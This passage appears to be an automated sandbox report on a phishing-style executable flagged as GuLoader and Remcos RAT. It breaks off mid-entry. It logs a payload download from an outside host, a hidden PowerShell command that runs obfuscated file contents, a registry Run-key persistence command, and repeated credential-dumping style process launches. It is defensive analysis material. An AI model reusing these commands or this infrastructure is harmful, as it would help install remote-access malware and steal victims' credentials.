5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 [TRUNCATED] Data Ascii: { "geoplugin_request":"191.96.150.225", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49739	104.21.45.139	443	7188	C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 17:01:51 UTC	177	OUT	GET /XpMumnKrmZynRk242.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: enelltd.top Cache-Control: no-cache
2024-05-02 17:01:51 UTC	839	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 17:01:51 GMT Content-Type: application/octet-stream Content-Length: 494656 Connection: close Last-Modified: Thu, 02 May 2024 12:12:55 GMT ETag: "66338347-78c40" Expires: Thu, 31 Dec 2037 23:55:55 GMT Cache-Control: max-age=315360000 CF-Cache-Status: HIT Age: 13087 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5ipxCdDXaUj%2FLYHTkG4c5d9Je3CjYMEeR6L6M0ezKhORpitzNe1bBbuPGC%2F9SxZY0QVeAgfEUCAbOiVbH182XLtJSsd9qXtoxvi0A1rpYSx0FICisKNwZyVEt68sWw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=0; includeSubDomains; preload X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 87d9935bdedb438d-EWR alt-svc: h3=":443"; ma=86400
2024-05-02 17:01:51 UTC	530	IN	Data Raw: 44 db e4 aa d7 31 2e 25 b7 8e e2 cf e4 69 3e 7b 32 bc f4 12 1a 10 fb b6 7d 1b 73 4d fe dd 77 6d de 33 36 65 38 20 22 10 3e 54 c2 0f 1d 5b 58 47 9e 8b cf c9 15 2b 7d 19 20 6e eb 99 6f 71 5a ce 89 33 9f 63 b4 2b 0b c5 a5 40 dd c0 22 8f ba d4 27 84 bd 52 3d 21 d8 7a 28 5a 52 6b 56 e0 d5 4c f6 47 77 78 e4 50 f3 cc 22 72 26 fd 59 f2 45 2b 9b dd f2 83 87 33 c1 17 f4 ba 11 a3 d0 2e a2 ae f3 1e 69 ff ad a1 61 88 5d 96 63 89 80 2a 1f 77 31 3f 73 12 c3 10 0e d8 ef 99 96 df f8 b8 cb 47 52 0c 7d 54 3e 1b 29 7e 1b 2d 53 09 ed c1 5f d7 02 67 11 3e 2e 7a 30 04 4e f2 fc dd 74 fb e1 a1 7a 0e a1 77 93 54 08 c7 91 bf 3e fe 81 7b 80 fd 8f 6a d0 8e be 0f 58 41 ba 1b be c8 43 a8 84 38 1c e4 37 38 5d fd ae f8 c4 8f 5e a6 b7 b5 1c 67 85 6f a9 8b d7 b8 aa 36 76 6a 2a 58 55 7f 95 Data Ascii: D1.%i>{2}sMwm36e8 ">T[XG+} noqZ3c+@"'R=!z(ZRkVLGwxP"r&YE+3.ia]cw1?sGR}T>)~-S_g>.z0NtzwT>{jXAC878]^go6vjXU
2024-05-02 17:01:51 UTC	1369	IN	Data Raw: 48 bf c0 b7 14 16 32 d0 f0 bb f2 73 4d 85 13 44 d7 f9 b7 b7 3d 91 42 07 e9 95 fb 2b 45 eb d5 e7 e5 b1 3f 2d 5e 96 97 6b bf 84 90 78 d3 09 42 03 4a 18 84 c6 e8 06 81 39 e6 f7 9f dd cf 55 5a 16 54 eb 02 a3 f8 b0 bf 5e 23 ee 6c 5c e8 54 38 f9 74 51 da cf 30 30 c7 98 e8 d5 4a 9c 91 56 2f 76 64 e8 8e 49 10 e4 0c b3 ef 2e b5 1f de 42 dc 48 df ac 7c 0a ec ad 76 1c 00 22 62 0a ad ad 96 6f 01 3b 9d da 18 8e 25 c2 21 1f 71 6e 52 54 c8 0b dc 09 33 ab cc 82 38 43 50 79 e8 bd 6d 19 ec 16 6d f6 74 2e fd 85 61 03 e9 00 28 6e c5 50 65 5b f0 9d 5e 23 56 b0 61 84 da ab 1b cc e8 37 9e f2 99 f2 48 03 04 69 70 05 57 88 38 e6 14 c9 62 77 1c cc 74 80 c8 d1 99 b0 91 93 f6 b2 40 8a cb 48 ef 59 aa be 9b b1 da 94 10 74 ab 80 73 d9 64 2c 6c 06 b7 17 bc 3c 47 74 e7 f1 34 01 17 67 ce Data Ascii: H2sMD=B+E?-^kxBJ9UZT^#l\T8tQ00JV/vdI.BH\|v"bo;%!qnRT38CPymmt.a(nPe[^#Va7HipW8bwt@HYtsd,l<Gt4g
2024-05-02 17:01:51 UTC	1369	IN	Data Raw: 35 2e ca b8 7f 4e 2a 54 19 02 60 93 4d 49 de 85 3f 16 d2 71 2b 64 9e 48 8b 22 50 13 47 a4 6b f9 9a 7f 3c 94 5a dc 55 5f d6 f7 a2 06 ce 7b e0 1c 05 b8 dd 6d 0d 03 0e 96 80 1b 67 59 57 eb ff f3 02 e5 21 47 e2 28 a5 1b 6d 46 e8 4e f0 be 50 0d 3b f2 99 c6 e3 99 bc 6b dc f9 05 35 c5 76 bc 66 4e 57 07 84 17 16 13 c0 4f a3 e4 34 4d 6d 51 49 d7 f9 df 7c bd d4 42 7f 25 a6 04 2f 1c 28 3c 88 de b0 3f 47 5e 2f a7 3d f8 84 78 45 e0 09 42 6b 9f 98 c1 c6 00 aa 9c 4e 83 d6 28 b7 cf ec 7f 3f 16 eb ea 96 cb b0 bf 44 f9 6e 29 58 00 c0 0b fa 74 08 19 76 d0 66 80 98 00 97 19 9d 91 5e e8 84 45 89 12 56 23 e7 ba 93 2d 97 2d d8 9c 42 34 1e ad ad 7c 14 1a 2d 33 1c e8 4a 51 09 ad f4 55 07 31 f3 9b da 70 8e c3 e0 40 94 05 1e c0 11 8c 06 23 1c 8f 29 8e 82 9b d9 07 3e e8 8e d2 d1 ba Data Ascii: 5.N*T`MI?q+dH"PGk<ZU_{mgYW!G(mFNP;k5vfNWO4MmQI\|B%/(<?G^/=xEBkN(?Dn)Xtvf^EV#--B4\|-3JQU1p@#)>
2024-05-02 17:01:51 UTC	1369	IN	Data Raw: 17 6c 35 1f f4 6d 37 cd 8f 84 a2 b0 5d 04 65 e2 53 ca 26 3e 1e ee 0e 5c 42 bd 81 f3 b6 9d 78 c2 de 33 c9 45 fd f9 0d 1c 1f 74 60 5f 9f f0 02 3d ba ee c9 be f2 e7 5e aa 3f 5b e4 a7 5e 9f da 64 46 2c 9b d6 f8 64 71 36 9e f5 4e d7 8b 1c bf 62 32 92 ef d9 20 ff 95 69 aa e9 24 58 4c 09 5d c5 5d 37 77 79 55 e1 11 61 6f 0c b2 9f 1c 98 bf c2 3f ad b3 69 2f f7 b3 eb f4 52 84 90 25 90 d1 a1 8e fb 85 04 56 9e 55 b7 0e 44 42 48 e1 d6 ed d5 21 84 d2 59 0e 55 3d 75 15 6e ca 49 90 ab ff 1b da 80 4b 55 e2 37 0f 19 6d 23 93 59 23 be 09 ce b9 8c 27 5e b6 8e ea 39 34 87 42 35 20 3b 18 9b 4e bf d8 5f f1 03 4a 03 af 30 62 fe c1 a1 8f 44 d7 f9 5f f1 28 91 42 ce 67 45 8a a3 61 6b d5 e7 e5 59 99 38 5e 96 ce e0 6f 09 dc 5c b7 e1 69 16 4a 18 dd 4d 38 8b e3 69 cb 67 65 c8 cf 55 76 Data Ascii: l5m7]eS&>\Bx3Et`_=^?[^dF,dq6Nb2 i$XL]]7wyUao?i/R%VUDBH!YU=unIKU7m#Y#'^94B5 ;N_J0bD_(BgEakY8^o\iJM8igeUv
2024-05-02 17:01:51 UTC	1369	IN	Data Raw: 53 03 9c 42 7f c5 df ea ec cf 1e 84 40 a6 da ed 68 9b 89 0c 1a c5 f7 a0 45 2b 00 14 1c 1e 50 7c a4 f2 95 09 0f e7 13 c3 48 7d 71 77 b7 42 f2 e4 7a a5 e3 94 b0 99 f4 2a 23 3a 63 fe 52 ab 5f 48 1b 98 94 a8 4c 7a 1a 06 33 29 2d b5 4a 52 89 6e 78 42 24 98 d3 c2 8e 7a 7a 0e 94 8a d0 9d 4e 43 6b 18 ee b7 5e 55 c8 cf 8f d5 03 e2 a2 31 a5 b6 3b 74 09 40 09 7a 1d b4 89 da a6 e3 dd 0b a8 a9 99 6d bd f9 d5 21 4a 97 86 17 d4 99 12 f3 6a 0d 4e ff ed 5e 7d 0b 2b b8 ed c3 e4 89 76 9c da 56 01 78 e1 c5 18 fd b8 f4 9a 7e e3 17 a4 a2 bc ae db 4c 69 a3 21 47 52 5c 6c 01 cd db 92 7a 5c 94 0e e1 1d 74 1a 56 af 38 57 45 39 db 3a 41 16 c0 3f fe 1d 94 dd 66 f6 eb 8f a7 24 d9 e1 f5 94 f9 92 37 4b 04 8e 99 55 b7 d5 f2 4a 6f b7 d6 60 00 8e 9e 3a 30 0c 03 57 d6 ea 2b 5d ec ff 53 74 Data Ascii: SB@hE+P\|H}qwBz*#:cR_HLz3)-JRnxB$zzNCk^U1;t@zm!JjN^}+vVx~Li!GR\lz\tV8WE9:A?f$7KUJo`:0W+]St
2024-05-02 17:01:51 UTC	1369	IN	Data Raw: 00 37 e7 28 e2 d6 aa e0 3d 65 12 19 4d 6c 22 2c 1f ba f6 e2 93 93 46 44 35 5a 8a 66 eb 09 90 f7 fe 53 41 26 b6 c1 82 17 01 22 8b ab 6a 6a 9e 48 e7 a5 24 fe 35 ee 2b ba 14 03 0d 8d be ab 9b c1 09 0f 1a 7e 7d b4 8d 2b 70 75 51 ad ae 16 08 88 1d 46 0b 5e 2b 0d 4e e5 8e 26 01 b0 42 d1 bb 5a b6 f5 9d c1 59 48 18 01 14 bd f9 7a bf 2d af ee b2 34 18 79 2d b1 aa 5e ba 1c 76 fb 9e ea 05 83 91 b9 ea 4e 84 d7 6c 87 b6 38 f8 de 23 84 4b 1b 6d 63 bc c9 eb 31 d0 89 2b 6c 00 fa f3 39 fe fe 6f 9c 38 75 21 53 5d 06 1b 7d 84 c9 5a 13 0d 98 63 a6 8b c1 8d a9 5b be 06 89 18 a0 1c 75 66 9a 41 d6 aa 6c 5b 4b 49 75 fb 9b 37 e4 b5 88 69 9c 7c 2d a6 00 b1 ed aa 4b fb 15 46 ff be a3 23 67 d9 63 c9 68 ac f7 b6 65 2d 63 da fa 57 18 15 0e c5 ab 94 0d cd 07 b5 f0 65 0d 0c bc 00 b8 d6 Data Ascii: 7(=eMl",FD5ZfSA&"jjH$5+~}+puQF^+N&BZYHz-4y-^vNl8#Kmc1+l9o8u!S]}Zc[ufAl[KIu7i\|-KF#gche-cWe
2024-05-02 17:01:51 UTC	1369	IN	Data Raw: 2b a0 4f 2d 09 c4 28 b7 e6 cc 9f e7 a6 4c 0a 81 0f 67 b7 2b c7 ad ed 1e 9b c0 35 ad 93 d7 9f 48 3e 2e 19 25 d8 29 e3 83 26 42 be 68 2c b3 09 7e 33 5c ec 22 ed 9a a9 b9 ce 87 a0 0d ba a0 50 56 02 6b ef ca 3e e8 f7 8a 2a d7 e4 23 fc d8 f9 b1 d2 1a af 27 a8 1e be 2a 62 93 1a 80 b2 f7 a4 48 53 62 3a 0b 4d a6 05 3b 8d 7a eb 8e 4d a3 d8 d3 e0 08 2e 1a 4f 9b f4 ac 0f d0 56 71 87 38 90 38 23 b3 99 74 3d 0e 81 c0 7c a1 50 eb e1 d5 69 16 e4 4a a8 b4 56 76 31 56 12 7f 36 0a 9a 08 73 37 04 ff a7 33 dd 55 47 95 0b 4c 53 ad ba 4a 65 74 65 4c 5d 8c b4 6e 95 0d 0f d8 7b b9 96 16 c6 f5 e5 37 95 42 97 04 6c 31 03 eb 52 0e ac f7 32 8d f2 24 76 78 59 3b 29 c5 7c 28 ae 60 be f8 43 7c 91 bb cf 5e e7 04 f8 78 23 3b b7 9e 23 de 59 1b 6d 65 bb ca 3b 16 89 4b af 10 71 75 1f ec 08 Data Ascii: +O-(Lg+5H>.%)&Bh,~3\"PVk>#'bHSb:M;zM.OVq88#t=\|PiJVv1V6s73UGLSJeteL]n{7Bl1R2$vxY;)\|(`C\|^x#;#Yme;Kqu
2024-05-02 17:01:51 UTC	1369	IN	Data Raw: f0 f9 4a 79 be 57 d2 4a b3 ee 65 3b 48 a6 ef f7 61 0c 6c 61 5f 3f 92 b7 31 b8 19 9d 5a b1 6c 45 81 7f c8 23 e4 f2 1a 74 bf 8c 8e 61 85 dc 3c ca 69 ae 8a 8b 78 0b 29 74 24 a3 99 cf b4 4e 7b ce f6 86 49 e3 cc aa 57 53 01 86 2d b0 08 dc 85 31 c1 2b 05 e1 d3 3e 14 df 77 0c 7e 5b 8b 8e 47 25 d4 2b 1e fe 55 e0 20 c5 bb 50 59 e3 4f ec c4 69 0f db 1d 81 a1 cf 62 cb 91 e4 d9 99 95 d4 9f 84 36 1e 19 25 31 56 68 5a 52 01 57 8a d7 b3 82 63 7b 90 04 b7 0c 33 a1 b6 2a 3f 5d f2 2f 2a f1 dc 0d f7 a3 3f 29 da 13 45 ee 20 04 23 60 aa fd b9 2c 0e 52 6a ab c6 b4 d1 a1 96 18 5d c0 c5 d3 a5 04 e9 7a 97 ff 5f 71 0b 3d 77 12 26 4d eb d3 d3 e0 ba 62 4d 48 3b cb cf f2 c1 1f 7b f3 08 54 ce 03 73 8b b8 d5 7b 9f 0d 03 56 bb 70 11 49 d4 60 e5 a5 50 65 f6 49 31 dc 1e 7f 36 ba a5 f1 78 Data Ascii: JyWJe;Hala_?1ZlE#ta<ix)t$N{IWS-1+>w~[G%+U PYOib6%1VhZRWc{3?]/?)E #`,Rj]z_q=w&MbMH;{Ts{VpI`PeI16x
2024-05-02 17:01:51 UTC	1369	IN	Data Raw: c8 01 6e d1 af 35 4a 95 27 25 b9 73 4d be 8d 4b c5 7d 2b 28 9f 97 31 fe c5 ea 84 7b 31 72 45 1f 8c cf cf 3f f8 9e c4 fe d1 13 9c 18 b7 64 15 7c 4d 31 20 22 72 05 09 4f 0c b3 a7 8a cd 67 2e 71 84 6c d2 32 2b be 98 77 6a bf 0d 19 45 42 b6 9a 37 6b 22 34 ec 0d 2c c8 2e 37 10 ee 8e c6 5b 7c cb 11 05 5d 76 2d 2c bc 93 06 91 3f 48 a6 9b 69 de ca 10 45 4b 87 b1 a2 e2 94 67 2a 5a 35 e4 0b ca ca b2 1f fa d4 fd e8 c6 6e 8e ea 8a 28 5f 9d 50 ae 22 5e 43 73 cf 60 db bd bc 2c 28 ed 72 31 82 4b b7 0b 48 42 fb 27 de 66 31 27 53 34 f9 db 3e d4 fa c4 1f 38 9f 11 24 bd 78 aa 74 98 eb eb 5f f3 a7 23 a3 1f df 4e 8e b6 7d 68 6b 4e 80 4d 17 94 66 a0 0b 4e 71 6b 0e fb 17 7f 3c 68 9f 84 bd 79 79 05 cc 51 ab d3 16 4f 76 db 3e 3f dd 17 fc b6 0c a2 1e 33 dd f9 6a d9 41 f1 8e a6 9f Data Ascii: n5J'%sMK}+(1{1rE?d\|M1 "rOg.ql2+wjEB7k"4,.7[\|]v-,?HiEKg*Z5n(_P"^Cs`,(r1KHB'f1'S4>8$xt_#N}hkNMfNqk<hyyQOv>?3jA
2024-05-02 17:01:51 UTC	1369	IN	Data Raw: 8d dd be ee 7d 62 ca e4 96 f4 ea 44 90 13 68 74 0a 05 0b 65 d2 58 62 09 64 3d e3 f4 17 0b fc 25 44 4e 99 a1 6d ce 0b 51 f3 ed a4 d5 0b 10 5e 45 15 67 56 a2 f4 7a 57 ef c6 5e de c3 7d 05 fd b9 e0 3c d2 08 7a 59 27 99 dd 6a fe f4 2d 88 b2 45 a8 41 b1 05 cb 9f fd 90 d5 15 cb 08 41 aa 5d bb 8e 3e 6e d1 af 35 79 8d 27 25 b9 16 08 6b 9a f8 46 b9 27 f3 da 0c 31 62 36 15 7b ad a8 a7 08 a4 8a cf cf 3f 19 af 46 81 c1 98 47 c4 6d 8d 0b 2d c6 dd 61 57 7e ed 49 ba 7e 09 3c 9e 01 8c 4d 87 40 ef 90 ae 66 78 d4 27 09 16 5a aa 9e 1f c4 70 fc 6c 95 20 13 91 ce df 05 20 06 97 00 8b 53 7a ce d2 19 91 0a da d2 81 14 c2 74 92 75 55 64 6e d8 12 e7 3d 7b 1c 15 a3 5d 29 1f 2c 4d b3 c5 70 f5 35 e5 c4 a6 7b a9 24 bf d6 99 ea 4f 2f 2b ac f5 75 55 83 73 54 03 52 d4 36 67 cf b4 4e 5b Data Ascii: }bDhteXbd=%DNmQ^EgVzW^}<zY'j-EAA]>n5y'%kF'1b6{?FGm-aW~I~<M@fx'Zpl SztuUdn={]),Mp5{$O/+uUsTR6gN[

Target ID:	0
Start time:	18:58:48
Start date:	02/05/2024
Path:	C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe"
Imagebase:	0x400000
File size:	501'264 bytes
MD5 hash:	CBFE477536E5434005EC40A22C8B79EE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	18:58:54
Start date:	02/05/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" -windowstyle hidden "$Moralioralist=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Amphioxidae.Zin';$Relaying=$Moralioralist.SubString(7931,3);.$Relaying($Moralioralist)"
Imagebase:	0xdc0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.3490629462.000000000C710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	18:58:54
Start date:	02/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	18:58:55
Start date:	02/05/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	19:01:26
Start date:	02/05/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe"
Imagebase:	0x430000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000003.3888277399.0000000009B5E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	19:01:48
Start date:	02/05/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Insecta" /t REG_EXPAND_SZ /d "%Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	19:01:48
Start date:	02/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	19:01:48
Start date:	02/05/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Insecta" /t REG_EXPAND_SZ /d "%Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)"
Imagebase:	0xbc0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	19:02:42
Start date:	02/05/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Imagebase:	0x430000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	19:02:42
Start date:	02/05/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Imagebase:	0x430000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	19:02:42
Start date:	02/05/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Imagebase:	0x430000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	19:02:42
Start date:	02/05/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Imagebase:	0x430000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	19:02:42
Start date:	02/05/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Imagebase:	0x430000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	19:02:42
Start date:	02/05/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Imagebase:	0x430000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	19:02:42
Start date:	02/05/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Imagebase:	0x430000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	19:02:42
Start date:	02/05/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Imagebase:	0x430000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	19:02:42
Start date:	02/05/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Imagebase:	0x430000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	19:02:42
Start date:	02/05/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Imagebase:	0x7ff726ad0000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	19:02:42
Start date:	02/05/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Imagebase:	0x430000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	19:02:42
Start date:	02/05/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Imagebase:	0x430000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	19:02:42
Start date:	02/05/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
